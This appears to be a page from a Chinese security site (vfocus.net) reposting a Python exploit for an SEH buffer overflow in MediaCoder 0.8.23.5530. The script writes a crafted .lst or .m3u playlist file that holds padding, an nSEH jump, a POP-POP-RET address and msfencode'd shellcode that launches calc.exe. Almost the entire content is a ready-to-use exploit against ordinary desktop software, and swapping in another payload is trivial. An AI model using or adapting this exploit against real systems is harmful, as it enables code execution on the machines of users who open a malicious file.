首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MediaCoder 0.8.23.5530 SEH Buffer Overflow Vulnerability
来源:vfocus.net 作者:metacom 发布时间:2013-07-15  
#!/usr/bin/python
print """
 [+]Exploit Title: Mediacoder 0.8.23.5530 SEH Buffer Overflow
 [+]Download All Product: http://www.mediacoderhq.com/editions.html
 [+]Vulnerable Product:!
 [+]Mediacoder 0.8.23.5530
 [+]Vulnerabilities File Format:lst,m3u
 [+]Other programs from http://www.mediacoderhq.com/editions.html not tested and may be vulnerable :)
 [+]Date (found): 17.07.2013
 [+]Date (publish): 17.07.2013
 [+]Founder: metacom
 [+]RST 
 [+]Tested on: Windows Xp pro-sp3 English
 """
buffer = "http://" + "\x41" * 845
nseh = "\xEB\x06\x90\x90"
seh= "\xD0\x12\xB0\x6A"# 6AB012D0   5F POP EDI
nops= "\x90" * 70
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c
shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e"
"\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10"
"\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7"
"\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5"
"\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97"
"\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f"
"\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd"
"\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2"
"\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04"
"\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3"
"\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d"
"\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e"
"\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4"
"\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f"
"\xaa\x4d")
junk = buffer + nseh + seh + nops + shell
   
filename = "exploit.lst";#You can change the format m3u :)
file = open(filename,"w")   
file.writelines(junk)
file.close()
print "File Is created"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MediaCoder .M3U Buffer Overflo
·Squid-3.3.5 DoS PoC
·Microsoft Windows Authenticate
·rpcbind (CALLIT Procedure) UDP
·Corel PDF Fusion Stack Buffer
·Light Audio Mixer Version 1.0.
·Tri-PLC Nano-10 r81 - Denial o
·Kate's Video Toolkit Version 7
·Ultra Mini HTTPD 1.21 - Stack
·Eglibc PTR MANGLE Bug
·nginx 1.3.9/1.4.0 x86 Brute Fo
·BlazeDVD Pro player 6.1 - Stac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved